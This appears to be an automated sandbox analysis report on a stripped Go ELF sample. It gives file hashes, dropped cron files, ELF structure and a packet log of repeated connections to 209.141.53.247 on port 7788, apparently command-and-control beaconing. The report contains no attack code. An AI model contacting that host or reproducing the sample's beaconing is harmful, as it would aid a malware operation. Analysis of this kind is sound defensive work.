SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/proc/5609/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/proc/5670/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/run/crond.pid

Download File

Process:	/usr/sbin/cron
File Type:	ASCII text
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:HVJHVJ:1JHVJ
MD5:	A0C1AFEC9787E1805C73DCC391DB17CB
SHA1:	E77C81DD5CF8A6F42BF051F455582F37E773316F
SHA-256:	5B20174B6184CF3D08C780B3855515A81188DCE396033CA9ECBADA6D9656B1D5
SHA-512:	80275742A78DD1B577EC4588800354A8D48C0DB52FA9CDF4D05D376980927AB0313E6620F6FC9263ACE409C1719075E6631468308BEB47312A0CDC7D03485BE3
Malicious:	false
Preview:	5704.5704.

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, Go BuildID=_U9f3XZujO1ziaaA9kDm/BXkeuDQ1mdANV2QHaIjH/wE0wc7HzHXzDzEQ2tVw9/s7Z6tpCNX0WmjkLFO5QS, stripped
Entropy (8bit):	6.253687938360149
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	ausNOyj9by.elf
File size:	5'181'592 bytes
MD5:	ac46e9818cd936fbfcba5effd7f4e850
SHA1:	9a058ce2e1a413ae24b0c23e49b68d1b2f3f2777
SHA256:	e23cd1ab03a3a03803e920efb2001fc6c4ae34c50ef647271898edc1c87ccde4
SHA512:	38fe3086130ccf009bd44d0d2666f1d9a03d993c7fccfdaa1fb6b779b457cb0c76147f95363b73326dc5a18bd1ed89883ed0952836b1368b38f5bc3378f6a4dc
SSDEEP:	49152:FPhq6f/l+XZKQn1VQPtHCVfsrAeg7UWsnc+m347J7Gr:+6f/lkBYCTo8r
TLSH:	DD363B50FAC715F6E9031D3044ABA27F57315E09CB24DB87EA44BF2AF93B692193620D
File Content Preview:	.ELF....................Po..4...........4. ...(.........4...4...4...................................d...d.............................'...'...............'..`,..`,..V"..V"..............@J...N...N.`...............Q.td.......................................

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x80b6f50
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	6
Section Header Offset:	244
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.text	PROGBITS	0x8049000	0x1000	0x27c4ed	0x0	0x6	AX	16
.rodata	PROGBITS	0x82c6000	0x27e000	0xcec59	0x0	0x2	A	32
.typelink	PROGBITS	0x8394c60	0x34cc60	0x1774	0x0	0x2	A	32
.itablink	PROGBITS	0x83963e0	0x34e3e0	0x490	0x0	0x2	A	32
.gosymtab	PROGBITS	0x8396870	0x34e870	0x0	0x0	0x2	A	1
.gopclntab	PROGBITS	0x8396880	0x34e880	0x154e60	0x0	0x2	A	32
.go.buildinfo	PROGBITS	0x84ec000	0x4a4000	0x1b0	0x0	0x3	WA	16
.noptrdata	PROGBITS	0x84ec1c0	0x4a41c0	0x468e0	0x0	0x3	WA	32
.data	PROGBITS	0x8532aa0	0x4eaaa0	0x57a8	0x0	0x3	WA	32
.bss	NOBITS	0x8538260	0x4f0260	0x2d808	0x0	0x3	WA	32
.noptrbss	NOBITS	0x8565a80	0x51da80	0x7f60	0x0	0x3	WA	32
.note.go.buildid	NOTE	0x8048f9c	0xf9c	0x64	0x0	0x2	A	4
.shstrtab	STRTAB	0x0	0x4f1000	0x98	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
PHDR	0x34	0x8048034	0x8048034	0xc0	0xc0	2.9237	0x4	R	0x1000
NOTE	0xf9c	0x8048f9c	0x8048f9c	0x64	0x64	5.2333	0x4	R	0x4	.note.go.buildid
LOAD	0x0	0x8048000	0x8048000	0x27d4ed	0x27d4ed	6.0477	0x5	R E	0x1000	.text .note.go.buildid
LOAD	0x27e000	0x82c6000	0x82c6000	0x2256e0	0x2256e0	5.7572	0x4	R	0x1000	.rodata .typelink .itablink .gosymtab .gopclntab
LOAD	0x4a4000	0x84ec000	0x84ec000	0x4c260	0x819e0	6.4658	0x6	RW	0x1000	.go.buildinfo .noptrdata .data .bss .noptrbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 18:13:13.978908062 CEST	44534	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:13.983733892 CEST	7788	44534	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:13.983838081 CEST	44534	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:13.986397982 CEST	44534	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:13.991256952 CEST	7788	44534	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:15.594968081 CEST	7788	44534	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:15.595479012 CEST	44534	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:15.597827911 CEST	44534	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:15.602547884 CEST	7788	44534	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:15.611056089 CEST	44536	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:15.615920067 CEST	7788	44536	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:15.615982056 CEST	44536	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:15.618510962 CEST	44536	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:15.623333931 CEST	7788	44536	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:17.230038881 CEST	7788	44536	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:17.231394053 CEST	44536	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:17.232498884 CEST	44536	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:17.237293959 CEST	7788	44536	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:17.246078968 CEST	44538	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:17.250860929 CEST	7788	44538	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:17.250948906 CEST	44538	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:17.255422115 CEST	44538	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:17.260215998 CEST	7788	44538	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:18.833977938 CEST	7788	44538	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:18.835345030 CEST	44538	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:18.836185932 CEST	44538	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:18.842900038 CEST	7788	44538	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:18.849167109 CEST	44540	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:18.853944063 CEST	7788	44540	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:18.854007959 CEST	44540	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:18.857336044 CEST	44540	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:18.862132072 CEST	7788	44540	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:20.557595015 CEST	7788	44540	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:20.559259892 CEST	44540	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:20.559361935 CEST	44540	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:20.760271072 CEST	7788	44540	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:20.760489941 CEST	44540	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:20.763495922 CEST	7788	44540	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:20.770406008 CEST	44542	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:20.775448084 CEST	7788	44542	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:20.775501966 CEST	44542	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:20.780689955 CEST	44542	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:20.785461903 CEST	7788	44542	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:22.386065006 CEST	7788	44542	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:22.387191057 CEST	44542	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:22.388020039 CEST	44542	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:22.393225908 CEST	7788	44542	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:22.404088974 CEST	44544	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:22.409037113 CEST	7788	44544	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:22.409085035 CEST	44544	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:22.411356926 CEST	44544	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:22.416450024 CEST	7788	44544	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:24.180080891 CEST	7788	44544	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:24.181886911 CEST	44544	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:24.189835072 CEST	7788	44544	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:24.195370913 CEST	44546	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:24.202636003 CEST	7788	44546	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:24.202713966 CEST	44546	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:24.205152988 CEST	44546	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:24.211858988 CEST	7788	44546	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:25.787130117 CEST	7788	44546	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:25.788908958 CEST	44546	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:25.793709040 CEST	7788	44546	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:25.800872087 CEST	44548	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:25.805736065 CEST	7788	44548	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:25.805794001 CEST	44548	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:25.808315039 CEST	44548	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:25.813050032 CEST	7788	44548	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:27.396617889 CEST	7788	44548	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:27.398530006 CEST	44548	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:27.403520107 CEST	7788	44548	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:27.410536051 CEST	44550	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:27.415379047 CEST	7788	44550	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:27.415432930 CEST	44550	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:27.417397022 CEST	44550	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:27.422266960 CEST	7788	44550	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:29.027040005 CEST	7788	44550	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:29.029330969 CEST	44550	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:29.034291029 CEST	7788	44550	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:29.043451071 CEST	44552	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:29.048276901 CEST	7788	44552	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:29.048338890 CEST	44552	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:29.056499958 CEST	44552	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:29.061378956 CEST	7788	44552	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:30.633251905 CEST	7788	44552	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:30.634848118 CEST	44552	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:30.634896040 CEST	44552	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:30.640676022 CEST	7788	44552	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:30.651601076 CEST	44554	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:30.656718016 CEST	7788	44554	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:30.656770945 CEST	44554	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:30.658667088 CEST	44554	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:30.666207075 CEST	7788	44554	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:32.280204058 CEST	7788	44554	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:32.282254934 CEST	44554	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:32.287062883 CEST	7788	44554	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:32.294147015 CEST	44556	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:32.298882961 CEST	7788	44556	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:32.298939943 CEST	44556	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:32.300693989 CEST	44556	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:32.305452108 CEST	7788	44556	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:33.881673098 CEST	7788	44556	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:33.882755995 CEST	44556	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:33.884275913 CEST	44556	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:33.889029980 CEST	7788	44556	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:33.896918058 CEST	44558	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:33.901649952 CEST	7788	44558	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:33.901698112 CEST	44558	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:33.903659105 CEST	44558	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:33.909133911 CEST	7788	44558	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:35.491439104 CEST	7788	44558	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:35.494556904 CEST	44558	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:35.500101089 CEST	7788	44558	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:35.509556055 CEST	44560	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:35.514419079 CEST	7788	44560	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:35.514511108 CEST	44560	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:35.517875910 CEST	44560	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:35.523747921 CEST	7788	44560	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:37.119867086 CEST	7788	44560	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:37.122615099 CEST	44560	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:37.122689009 CEST	44560	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:37.127716064 CEST	7788	44560	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:37.136730909 CEST	44562	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:37.141622066 CEST	7788	44562	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:37.141714096 CEST	44562	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:37.144500971 CEST	44562	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:37.149794102 CEST	7788	44562	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:38.726708889 CEST	7788	44562	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:38.728766918 CEST	44562	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:38.733666897 CEST	7788	44562	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:38.740493059 CEST	44564	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:38.745615005 CEST	7788	44564	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:38.745759964 CEST	44564	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:38.747786045 CEST	44564	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:38.752566099 CEST	7788	44564	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:40.581878901 CEST	7788	44564	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:40.582475901 CEST	44564	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:40.584935904 CEST	44564	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:40.612796068 CEST	7788	44564	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:40.612837076 CEST	7788	44564	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:40.612870932 CEST	44564	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:40.616715908 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:40.621603966 CEST	7788	44566	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:40.621658087 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:40.624125004 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:40.628988028 CEST	7788	44566	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:42.209018946 CEST	7788	44566	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:42.210403919 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:42.212349892 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:42.217189074 CEST	7788	44566	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:42.224966049 CEST	44568	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:42.229779005 CEST	7788	44568	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:42.229847908 CEST	44568	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:42.232851028 CEST	44568	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:42.237703085 CEST	7788	44568	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:43.820372105 CEST	7788	44568	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:43.822432995 CEST	44568	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:43.824500084 CEST	44568	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:43.829293013 CEST	7788	44568	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:43.841608047 CEST	44570	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:43.847439051 CEST	7788	44570	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:43.847513914 CEST	44570	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:43.854423046 CEST	44570	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:43.859405994 CEST	7788	44570	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:45.465576887 CEST	7788	44570	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:45.466267109 CEST	44570	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:45.468724012 CEST	44570	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:45.473653078 CEST	7788	44570	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:45.482409954 CEST	44572	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:45.487396002 CEST	7788	44572	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:45.487493038 CEST	44572	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:45.490643024 CEST	44572	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:45.495575905 CEST	7788	44572	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:47.247170925 CEST	7788	44572	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:47.249806881 CEST	44572	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:47.256038904 CEST	7788	44572	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:47.264278889 CEST	44574	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:47.269103050 CEST	7788	44574	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:47.269166946 CEST	44574	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:47.273125887 CEST	44574	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:47.281322956 CEST	7788	44574	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:48.869649887 CEST	7788	44574	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:48.870177031 CEST	44574	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:48.872292995 CEST	44574	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:48.877142906 CEST	7788	44574	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:48.884917021 CEST	44576	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:48.890006065 CEST	7788	44576	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:48.890083075 CEST	44576	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:48.896682978 CEST	44576	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:48.901545048 CEST	7788	44576	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:50.492943048 CEST	7788	44576	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:50.494066954 CEST	44576	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:50.495898962 CEST	44576	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:50.500673056 CEST	7788	44576	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:50.511117935 CEST	44578	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:50.516057968 CEST	7788	44578	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:50.516134977 CEST	44578	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:50.521778107 CEST	44578	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:50.526709080 CEST	7788	44578	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:52.116014004 CEST	7788	44578	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:52.117805958 CEST	44578	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:52.122672081 CEST	7788	44578	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:52.131154060 CEST	44580	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:52.136190891 CEST	7788	44580	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:52.136245966 CEST	44580	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:52.138036966 CEST	44580	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:52.142853975 CEST	7788	44580	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:53.725862980 CEST	7788	44580	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:53.728055954 CEST	44580	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:53.732950926 CEST	7788	44580	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:53.739171982 CEST	44582	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:53.744854927 CEST	7788	44582	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:53.744923115 CEST	44582	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:53.748522997 CEST	44582	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:53.753571033 CEST	7788	44582	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:55.474291086 CEST	7788	44582	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:55.476049900 CEST	44582	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:55.480876923 CEST	7788	44582	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:55.487606049 CEST	44584	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:55.492422104 CEST	7788	44584	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:55.492507935 CEST	44584	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:55.494812012 CEST	44584	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:55.499739885 CEST	7788	44584	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:57.107391119 CEST	7788	44584	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:57.109198093 CEST	44584	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:57.114064932 CEST	7788	44584	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:57.121283054 CEST	44586	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:57.126133919 CEST	7788	44586	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:57.126204014 CEST	44586	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:57.129148006 CEST	44586	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:57.133929014 CEST	7788	44586	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:58.729006052 CEST	7788	44586	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:58.729721069 CEST	44586	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:58.731642008 CEST	44586	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:58.736776114 CEST	7788	44586	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:58.742845058 CEST	44588	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:58.747694016 CEST	7788	44588	209.141.53.247	192.168.2.14
Jul 2, 2024 18:13:58.747749090 CEST	44588	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:58.750113964 CEST	44588	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:13:58.754956961 CEST	7788	44588	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:00.354080915 CEST	7788	44588	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:00.356043100 CEST	44588	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:00.360800982 CEST	7788	44588	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:00.368726015 CEST	44590	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:00.373614073 CEST	7788	44590	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:00.373667955 CEST	44590	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:00.375663996 CEST	44590	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:00.381382942 CEST	7788	44590	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:01.970207930 CEST	7788	44590	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:01.971995115 CEST	44590	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:01.976798058 CEST	7788	44590	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:01.984332085 CEST	44592	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:01.989208937 CEST	7788	44592	209.141.53.247	192.168.2.14
